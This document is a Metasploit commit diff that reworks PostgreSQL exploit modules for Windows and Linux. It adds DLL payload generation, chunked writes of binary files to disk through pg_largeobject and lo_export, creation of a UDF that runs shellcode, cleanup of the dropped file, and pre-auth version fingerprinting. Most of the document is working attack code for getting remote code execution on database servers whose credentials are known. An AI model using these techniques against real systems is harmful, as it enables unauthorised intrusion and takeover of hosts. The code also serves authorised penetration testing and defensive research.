Make Windows postgres_payload more generic

* Adds Exploit::EXE to windows/postgres/postgres_payload. This gives us
  the ability to use generate_payload_dll() which generates a generic dll
  that spawns rundll32 and runs the shellcode in that process. This is
  basically what the linux version accomplishes by compiling the .so on
  the fly. On major advantage of this is that the resulting DLL will
  work on pretty much any version of postgres

* Adds Exploit::FileDropper to windows version as well. This gives us
  the ability to delete the dll via the resulting session, which works
  because the template dll contains code to shove the shellcode into a
  new rundll32 process and exit, thus leaving the file closed after
  Postgres calls FreeLibrary.

* Adds pre-auth fingerprints for 9.1.5 and 9.1.6 on Ubuntu and 9.2.1 on

* Adds a check method to both Windows and Linux versions that simply
  makes sure that the given credentials work against the target service.

* Replaces the version-specific lo_create method with a generic
  technique that works on both 9.x and 8.x

* Fixes a bug when targeting 9.x; "language C" in the UDF creation query
  gets downcased and subsequently causes postgres to error out before
  opening the DLL

* Cleans up lots of rdoc in Exploit::Postgres
This commit is contained in:
James Lee 2012-12-22 00:30:09 -06:00
parent 4595a96ece
commit 20cc2fa38d
3 changed files with 254 additions and 172 deletions

View File

@ -13,10 +13,13 @@ module Exploit::Remote::Postgres
require 'postgres_msf'
require 'base64'
include Msf::Db::PostgresPR
# @!attribute [rw] postgres_conn
# @return [::Msf::Db::PostgresPR::Connection]
attr_accessor :postgres_conn
# Creates an instance of a MSSQL exploit module.
# Creates an instance of a PostgreSQL exploit module.
def initialize(info = {})
@ -38,27 +41,66 @@ module Exploit::Remote::Postgres
register_autofilter_services(%W{ postgres })
# postgres_login takes a number of arguments (defaults to the datastore for
# appropriate values), and will either populate self.postgres_conn and return
# :connected, or will return :error, :error_databse, or :error_credentials
# Fun fact: if you get :error_database, it means your username and password
# was accepted (you just failed to guess a correct running database instance).
# Note that postgres_login will first trigger postgres_logout if the module
# is already connected.
def postgres_login(args={})
# @!group Datastore accessors
# Return the datastore value of the same name
# @return [String] IP address of the target
def rhost; datastore['RHOST']; end
# Return the datastore value of the same name
# @return [Fixnum] TCP port where the target service is running
def rport; datastore['RPORT']; end
# Return the datastore value of the same name
# @return [String] Username for authentication
def username; datastore['USERNAME']; end
# Return the datastore value of the same name
# @return [String] Password for authentication
def password; datastore['PASSWORD']; end
# Return the datastore value of the same name
# @return [String] Database to connect to when authenticating
def database; datastore['DATABASE']; end
# Return the datastore value of the same name
# @return [Boolean] Whether to print verbose output
def verbose; datastore['VERBOSE']; end
# @!endgroup
# Takes a number of arguments (defaults to the datastore for appropriate
# values), and will either populate {#postgres_conn} and return
# +:connected+, or will return +:error+, +:error_databse+, or
# +:error_credentials+ in case of an error.
# Fun fact: if you get +:error_database+, it means your username and
# password was accepted (you just failed to guess a correct running database
# instance).
# @note This method will first call {#postgres_logout} if the module is
# already connected.
# @param opts [Hash] Options for authenticating
# @option opts [String] :database The database
# @option opts [String] :username The username
# @option opts [String] :username The username
# @option opts [String] :server IP address or hostname of the target server
# @option opts [Fixnum] :port TCP port on :server
# @return [:error_database] if user/pass are correct but database is wrong
# @return [:error_credentials] if user/pass are wrong
# @return [:error] if some other error occurred
# @return [:connected] if everything went as planned
def postgres_login(opts={})
postgres_logout if self.postgres_conn
db = args[:database] || datastore['DATABASE']
username = args[:username] || datastore['USERNAME']
password = args[:password] || datastore['PASSWORD']
ip = args[:server] || datastore['RHOST']
port = args[:port] || datastore['RPORT']
db = opts[:database] || datastore['DATABASE']
username = opts[:username] || datastore['USERNAME']
password = opts[:password] || datastore['PASSWORD']
ip = opts[:server] || datastore['RHOST']
port = opts[:port] || datastore['RPORT']
uri = "tcp://#{ip}:#{port}"
if Rex::Socket.is_ipv6?(ip)
uri = "tcp://[#{ip}]:#{port}"
verbose = args[:verbose] || datastore['VERBOSE']
verbose = opts[:verbose] || datastore['VERBOSE']
self.postgres_conn =,username,password,uri)
rescue RuntimeError => e
@ -80,7 +122,9 @@ module Exploit::Remote::Postgres
# Logs out of a database instance.
# Logs out of a database instance and sets {#postgres_conn} to nil
# @return [void]
def postgres_logout
ip = datastore['RHOST']
port = datastore['RPORT']
@ -92,9 +136,13 @@ module Exploit::Remote::Postgres
print_status "#{ip}:#{port} Postgres - Disconnected" if verbose
# If not currently connected, postgres_query will attempt to connect. If an
# If not currently connected, attempt to connect. If an
# error is encountered while executing the query, it will return with
# :error ; otherwise, it will return with :complete.
# @param sql [String] The query to run
# @param doprint [Boolean] Whether the result should be printed
# @return [Hash]
def postgres_query(sql=nil,doprint=false)
ip = datastore['RHOST']
port = datastore['RPORT']
@ -104,7 +152,7 @@ module Exploit::Remote::Postgres
if self.postgres_conn
sql ||= datastore['SQL']
print_status "#{ip}:#{port} Postgres - querying with '#{sql}'" if datastore['VERBOSE']
vprint_status "#{ip}:#{port} Postgres - querying with '#{sql}'"
resp = self.postgres_conn.query(sql)
rescue RuntimeError => e
@ -151,15 +199,21 @@ module Exploit::Remote::Postgres
return :complete
# postgres_fingerprint attempts to fingerprint a remote Postgresql instance,
# inferring version number from the failed authentication messages.
# Attempts to fingerprint a remote PostgreSQL instance, inferring version
# number from the failed authentication messages or simply returning the
# result of "select version()" if authentication was successful.
# @return [Hash] A hash containing the version in one of the keys :preauth,
# :auth, or :unkown, depending on how it was determined
# @see #postgres_authed_fingerprint
# @see #analyze_auth_error
def postgres_fingerprint(args={})
return postgres_authed_fingerprint if self.postgres_conn
db = args[:database] || datastore['DATABASE']
username = args[:username] || datastore['USERNAME']
password = args[:password] || datastore['PASSWORD']
rhost = args[:server] || datastore['RHOST']
rport = args[:port] || datastore['RPORT']
rhost = args[:server] || datastore['RHOST']
rport = args[:port] || datastore['RPORT']
uri = "tcp://#{rhost}:#{rport}"
if Rex::Socket.is_ipv6?(rhost)
@ -176,6 +230,10 @@ module Exploit::Remote::Postgres
return postgres_authed_fingerprint if self.postgres_conn
# Ask the server what its version is
# @return (see #postgres_fingerprint)
# @see #postgres_fingerprint
def postgres_authed_fingerprint
resp = postgres_query("select version()",false)
ver = resp[:complete].rows[0][0]
@ -185,6 +243,10 @@ module Exploit::Remote::Postgres
# Matches up filename, line number, and routine with a version.
# These all come from source builds of Postgres. TODO: check
# in on the binary distros, see if they're different.
# @param e [RuntimeError] The exception raised by
# @return (see #postgres_fingerprint)
# @see #postgres_fingerprint
def analyze_auth_error(e)
fname,fline,froutine = e.to_s.split("\t")[3,3]
fingerprint = "#{fname}:#{fline}:#{froutine}"
@ -223,14 +285,26 @@ module Exploit::Remote::Postgres
when "Fauth.c:L273:Rauth_failed" ; return {:preauth => "8.4.2"} # Failed (bad db, bad credentials)
when "Fauth.c:L364:RClientAuthentication" ; return {:preauth => "8.4.2"} # Rejected (maybe good)
when "Fmiscinit.c:L432:RInitializeSessionUserId" ; return {:preauth => "9.1.5"} # Failed (bad db, bad credentials)
when "Fpostinit.c:L709:RInitPostgres" ; return {:preauth => "9.1.5"} # Failed (bad db, good credentials)
when "Fauth.c:L302:Rauth_failed" ; return {:preauth => "9.1.6"} # Bad password, good database
when "Fpostinit.c:L718:RInitPostgres" ; return {:preauth => "9.1.6"} # Good creds, non-existent but allowed database
when "Fauth.c:L483:RClientAuthentication" ; return {:preauth => "9.1.6"} # Bad user
# Windows
when 'F.\src\backend\libpq\auth.c:L273:Rauth_failed' ; return {:preauth => "8.4.2-Win"} # Failed (bad db, bad credentials)
when 'F.\src\backend\utils\init\postinit.c:L422:RInitPostgres' ; return {:preauth => "8.4.2-Win"} # Failed (bad db, good credentials)
when 'F.\src\backend\libpq\auth.c:L359:RClientAuthentication' ; return {:preauth => "8.4.2-Win"} # Rejected (maybe good)
when 'F.\src\backend\libpq\auth.c:L464:RClientAuthentication' ; return {:preauth => "9.0.3-Win"} # Rejected (not allowed in pg_hba.conf)
when 'F.\src\backend\libpq\auth.c:L297:Rauth_failed' ; return {:preauth => "9.0.3-Win"} # Rejected (bad db or bad creds)
when 'Fsrc\backend\libpq\auth.c:L302:Rauth_failed' ; return {:preauth => "9.2.1-Win"} # Rejected (bad db or bad creds)
when 'Fsrc\backend\utils\init\postinit.c:L717:RInitPostgres' ; return {:preauth => "9.2.1-Win"} # Failed (bad db, good credentials)
when 'Fsrc\backend\libpq\auth.c:L479:RClientAuthentication' ; return {:preauth => "9.2.1-Win"} # Rejected (not allowed in pg_hba.conf)
# OpenSolaris (thanks Alexander!)
when 'Fmiscinit.c:L420:' ; return {:preauth => '8.2.6-8.2.13-OpenSolaris'} # Failed (good db, bad credentials)
@ -243,6 +317,8 @@ module Exploit::Remote::Postgres
# @return [String] The password as provided by the user or a random one if
# none has been given.
def postgres_password
if datastore['PASSWORD'].to_s.size > 0
@ -252,7 +328,7 @@ module Exploit::Remote::Postgres
# This presumes the user has rights to both the file and to create a table.
# If not, postgre_query() will return an error (usually :sql_error),
# If not, {#postgres_query} will return an error (usually :sql_error),
# and it should be dealt with by the caller.
def postgres_read_textfile(filename)
# Check for temp table creation privs first.
@ -267,6 +343,8 @@ module Exploit::Remote::Postgres
return postgres_query(read_query,true)
# @return [Boolean] Whether the current user has privilege +priv+ on the
# current database
def postgres_has_database_privilege(priv)
sql = %Q{select has_database_privilege(current_user,current_database(),'#{priv}')}
ret = postgres_query(sql,false)
@ -278,8 +356,9 @@ module Exploit::Remote::Postgres
# Creates the function sys_exec() in the pg_temp schema.
# @deprecated Just get a real shell instead
def postgres_create_sys_exec(dll)
q = "create or replace function pg_temp.sys_exec(text) returns int4 as '#{dll}', 'sys_exec' language C returns null on null input immutable"
q = "create or replace function pg_temp.sys_exec(text) returns int4 as '#{dll}', 'sys_exec' language c returns null on null input immutable"
resp = postgres_query(q);
if resp[:sql_error]
print_error "Error creating pg_temp.sys_exec: #{resp[:sql_error]}"
@ -290,6 +369,8 @@ module Exploit::Remote::Postgres
# This presumes the pg_temp.sys_exec() udf has been installed, almost
# certainly by postgres_create_sys_exec()
# @deprecated Just get a real shell instead
def postgres_sys_exec(cmd)
print_status "Attempting to Execute: #{cmd}"
q = "select pg_temp.sys_exec('#{cmd}')"
@ -302,88 +383,106 @@ module Exploit::Remote::Postgres
# Takes a local filename and uploads it into a table as a Base64 encoded string.
# Returns an array if successful, false if not.
# Uploads the given local file to the remote server
# @param fname [String] Name of a file on the local filesystem to be
# uploaded
# @param remote_fname (see #postgres_upload_binary_data)
# @return (see #postgres_upload_binary_data)
def postgres_upload_binary_file(fname, remote_fname=nil)
data =
postgres_upload_binary_data(data, remote_fname)
# Writes data to disk on the target server.
# This is accomplished in 5 steps:
# 1. Create a new object with "select lo_create(-1)"
# 2. Delete any resulting rows in pg_largeobject table.
# On 8.x and older, postgres inserts rows as a result of the call to
# lo_create. Deleting them here approximates the state on 9.x where no
# such insert happens.
# 3. Break the data into LOBLOCKSIZE-byte chunks.
# 4. Insert each of the chunks as a row in pg_largeobject
# 5. Select lo_export to write the file to disk
# @param data [String] Raw binary to write to disk
# @param remote_fname [String] Name of the file on the remote server where
# the data will be stored. Default is "<random>.dll"
# @return [nil] if any part of this process failed
# @return [String] if everything went as planned, the name of the file we
# dropped. This is really only useful if +remote_fname+ is nil
def postgres_upload_binary_data(data, remote_fname=nil)
data = postgres_base64_data(data)
tbl,fld = postgres_create_stager_table
return false unless data && tbl && fld
q = "insert into #{tbl}(#{fld}) values('#{data}')"
resp = postgres_query(q)
if resp[:sql_error]
print_error resp[:sql_error]
return false
oid, fout = postgres_write_data_to_disk(tbl,fld,remote_fname)
return false unless oid && fout
return [tbl,fld,fout,oid]
# Writes b64 data from a table field, decoded, to disk.
# This is accomplished with 3 sql queries:
# 1. select lo_create
# 2. version dependant:
# - on 9.x, insert into pg_largeobject
# - on older versions, update pg_largeobject
# 3. select lo_export to write the file to disk
def postgres_write_data_to_disk(tbl,fld,remote_fname=nil)
oid = rand(60000) + 1000
remote_fname ||= Rex::Text::rand_text_alpha(8) + ".dll"
ver = postgres_fingerprint
case ver[:auth]
when /PostgreSQL 9\./
# 9.x does *not* insert the largeobject into the table when you do
# the lo_create, so we must insert it ourselves.
queries = [
"select lo_create(#{oid})",
"insert into pg_largeobject select #{oid}, 0, decode((select #{fld} from #{tbl}), 'base64')",
"select lo_export(#{oid}, '#{remote_fname}')"
# 8.x inserts the largeobject into the table when you do the
# lo_create, so we with a value.
# 7.x is an unknown, but this behavior was the default before the
# addition of support for 9.x above, so try it this way and hope
# for the best
queries = [
"select lo_create(#{oid})",
"update pg_largeobject set data=(decode((select #{fld} from #{tbl}), 'base64')) where loid=#{oid}",
"select lo_export(#{oid}, '#{remote_fname}')"
# From the Postgres documentation:
# SELECT lo_creat(-1); -- returns OID of new, empty large object
# Doing it this way instead of calling lo_create with a random number
# ensures that we don't accidentally hit the id of a real object.
resp = postgres_query "select lo_creat(-1)"
unless resp and resp[:complete] and resp[:complete].rows[0]
print_error "Failed to get a new loid"
oid = resp[:complete].rows[0][0].to_i
queries = [ "delete from pg_largeobject where loid=#{oid}" ]
# Break the data into smaller chunks that can fit in the size allowed in
# the pg_largeobject data column.
# From the postgres documentation:
# "The amount of data per page is defined to be LOBLKSIZE (which is
# currently BLCKSZ/4, or typically 2 kB)."
# Empirically, it seems that 8kB is fine on 9.x, but we play it safe and
# stick to 2kB.
chunks = []
while ((c = data.slice!(0..2047)) && c.length > 0)
chunks.push c
chunks.each_with_index do |chunk, pageno|
b64_data = postgres_base64_data(chunk)
insert = "insert into pg_largeobject (loid,pageno,data) values(%d, %d, decode('%s', 'base64'))"
queries.push( "#{insert}"%[oid, pageno, b64_data] )
queries.push "select lo_export(#{oid}, '#{remote_fname}')"
# Now run each of the queries we just built
queries.each do |q|
resp = postgres_query(q)
if resp && resp[:sql_error]
print_error "Could not write the library to disk."
print_error resp[:sql_error]
# Can't really recover from this, bail
return nil
return oid,remote_fname
return remote_fname
# Base64's a file and returns the data.
# Calls {#postgres_base64_data} with the contents of file +fname+
# @param fname [String] Name of a file on the local system
# @return (see #postgres_base64_data)
def postgres_base64_file(fname)
data =, "rb") {|f| f.stat.size}
# Converts data to base64 with no newlines
# @param data [String] Raw data to be base64'd
# @return [String] A base64 string suitable for passing to postgresql's
# decode(..., 'base64') function
def postgres_base64_data(data)
# Creates a temporary table to store base64'ed binary data in.
# @deprecated No longer necessary since we can insert base64 data directly
def postgres_create_stager_table
tbl = Rex::Text.rand_text_alpha(8).downcase
fld = Rex::Text.rand_text_alpha(8).downcase

View File

@ -1,7 +1,3 @@
# $Id$
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -42,7 +38,6 @@ class Metasploit3 < Msf::Exploit::Remote
'todb' # original windows module this is based on
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[ 'URL', '' ]
@ -66,17 +61,15 @@ class Metasploit3 < Msf::Exploit::Remote
deregister_options('SQL', 'RETURN_ROWSET')
# Buncha stuff to make typing easier.
def username; datastore['USERNAME']; end
def password; datastore['PASSWORD']; end
def database; datastore['DATABASE']; end
def rhost; datastore['rhost']; end
def rport; datastore['rport']; end
def verbose; datastore['VERBOSE']; end
def bits; datastore['BITS'];end
def check
version = postgres_fingerprint
def execute_command(cmd, opts)
if version[:auth]
return CheckCode::Vulnerable
print_error "Authentication failed. #{version[:preauth] || version[:unknown]}"
return CheckCode::Safe
def exploit
@ -89,28 +82,27 @@ class Metasploit3 < Msf::Exploit::Remote
fname = "/tmp/#{Rex::Text.rand_text_alpha(8)}.so"
tbl,fld,so,oid = postgres_upload_binary_data(payload_so(fname), fname)
unless tbl && fld && so && oid
unless postgres_upload_binary_data(payload_so(fname), fname)
print_error "Could not upload the UDF SO"
print_status "Uploaded #{so} as OID #{oid} to table #{tbl}(#{fld})"
print_status "Uploaded as #{fname}, should be cleaned up automatically"
func_name = Rex::Text.rand_text_alpha(10)
"create or replace function pg_temp.#{func_name}()"+
" returns void as '#{so}','#{func_name}'"+
" language 'C' strict immutable"
" returns void as '#{fname}','#{func_name}'"+
" language c strict immutable"
rescue RuntimeError => e
print_error "Failed to create UDF function: #{e.class}: #{e}"
postgres_logout if @postgres_conn
# Authenticate to the postgres server.
# Returns the version from #postgres_fingerprint
@ -132,6 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote
return result[:auth]
print_status("Login failed, fingerprint is #{result[:preauth] || result[:unknown]}")
return :noauth
rescue Rex::ConnectionError, Rex::Post::Meterpreter::RequestError

View File

@ -1,7 +1,3 @@
# $Id$
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
@ -11,29 +7,29 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Postgres
include Msf::Exploit::CmdStagerVBS
include Msf::Auxiliary::Report
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
# Creates an instance of this module.
def initialize(info = {})
'Name' => 'PostgreSQL for Microsoft Windows Payload Execution',
'Description' => %q{
This module creates and enables a custom UDF (user defined function) on the
target host via the UPDATE pg_largeobject method of binary injection. On
default Microsoft Windows installations of PostgreSQL (=< 8.4), the postgres
service account may write to the Windows temp directory, and may source
UDF DLL's from there as well.
On default Microsoft Windows installations of PostgreSQL the postgres
service account may write to the current directory (which is usually
"C:\Program Files\PostgreSQL\<version>\data" where <version> is the
major.minor version of PostgreSQL). UDF DLL's may be sourced from
there as well.
PostgreSQL versions 8.2.x, 8.3.x, and 8.4.x on Microsoft Windows (32-bit) are
valid targets for this module.
NOTE: This module will leave a payload executable on the target system when the
attack is finished, as well as the UDF DLL and the OID.
This module uploads a Windows DLL file via the pg_largeobject method
of binary injection and creates a UDF (user defined function) from
that DLL. Because the payload is run from DllMain, it does not need to
conform to specific Postgres API versions.
'Author' =>
@ -41,18 +37,17 @@ class Metasploit3 < Msf::Exploit::Remote
'todb' # this Metasploit module
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[ 'URL', '',
'URL', '' # A litte more specific to PostgreSQL
[ 'URL', '', ],
[ 'URL', '' ], # A litte more specific to PostgreSQL
'Platform' => 'win',
'Targets' =>
[ 'Automatic', { } ], # Confirmed on XXX
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x86_64', { 'Arch' => ARCH_X86_64 } ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Apr 10 2009' # Date of Bernardo's BH Europe paper.
@ -60,83 +55,78 @@ class Metasploit3 < Msf::Exploit::Remote
deregister_options('SQL', 'RETURN_ROWSET')
# Buncha stuff to make typing easier.
def username; datastore['USERNAME']; end
def password; datastore['PASSWORD']; end
def database; datastore['DATABASE']; end
def verbose; datastore['VERBOSE']; end
def rhost; datastore['RHOST']; end
def rport; datastore['RPORT']; end
def check
version = postgres_fingerprint
def execute_command(cmd, opts)
if version[:auth]
print_status "Authentication successful. Version: #{version}"
return CheckCode::Vulnerable
print_error "Authentication failed. #{version[:preauth] || version[:unknown]}"
return CheckCode::Safe
def exploit
version = get_version(username,password,database,verbose)
version = do_login(username,password,database)
case version
when :nocompat; print_error "Authentication successful, but not a compatable version."
when :noauth; print_error "Authentication failed."
when :noconn; print_error "Connection failed."
when :noauth; print_error "Authentication failed."; return
when :noconn; print_error "Connection failed."; return
print_status("#{rhost}:#{rport} - #{version}")
return unless version =~ /8\.[234]/
print_status "Authentication successful and vulnerable version #{version} on Windows confirmed."
tbl,fld,dll,oid = postgres_upload_binary_file(dll_fname(version))
unless tbl && fld && dll && oid
fname = "#{Rex::Text.rand_text_alpha(8)}.dll"
unless postgres_upload_binary_data(generate_payload_dll, fname)
print_error "Could not upload the UDF DLL"
print_status "Uploaded #{dll} as OID #{oid} to table #{tbl}(#{fld})"
ret_sys_exec = postgres_create_sys_exec(dll)
if ret_sys_exec
if @postgres_conn
execute_cmdstager({:linemax => 1500, :nodelete => true, :temp=>"."})
postgres_logout if @postgres_conn
print_error "Lost connection."
print_status "Uploaded as #{fname}"
func_name = Rex::Text.rand_text_alpha(10)
"create or replace function pg_temp.#{func_name}()"+
" returns void as '#{fname}','#{func_name}'"+
" language c strict immutable"
rescue RuntimeError => e
print_error "Failed to create UDF function: #{e.class}: #{e}"
postgres_logout if @postgres_conn
def dll_fname(version)
# A shorter version of do_fingerprint from the postgres_version scanner
# module, specifically looking for versions that valid targets for this
# module.
def get_version(user=nil,pass=nil,database=nil,verbose=false)
# Authenticate to the postgres server.
# Returns the version from #postgres_fingerprint
def do_login(user=nil,pass=nil,database=nil)
msg = "#{rhost}:#{rport} Postgres -"
password = pass || postgres_password
vprint_status("Trying username:'#{user}' with password:'#{password}' against #{rhost}:#{rport} on database '#{database}'")
vprint_status("Trying #{user}:#{password}@#{rhost}:#{rport}/#{database}")
result = postgres_fingerprint(
:db => database,
:username => user,
:password => password
if result[:auth]
# So, the only versions we have DLL binaries for are PostgreSQL 8.2, 8.3, and 8.4
# This also checks to see if it was compiled with a windows-based compiler --
# the stock Postgresql downloads are Visual C++ for 8.4 and 8.3, and GCC for mingw)
# Also, the method to write files to disk doesn't appear to work on 9.0, so
# tabling that version for now.
if result[:auth] =~ /PostgreSQL (8\.[234]).*(Visual C\+\+|mingw|cygwin)/i
return $1
print_status "Found #{result[:auth]}"
return :nocompat
:host => rhost,
:port => rport,
:name => "postgres",
:info => result.values.first
return result[:auth]
print_status("Login failed, fingerprint is #{result[:preauth] || result[:unknown]}")
return :noauth
rescue Rex::ConnectionError
vprint_error "#{rhost}:#{rport} Connection Error: #{$!}"
rescue Rex::ConnectionError, Rex::Post::Meterpreter::RequestError
return :noconn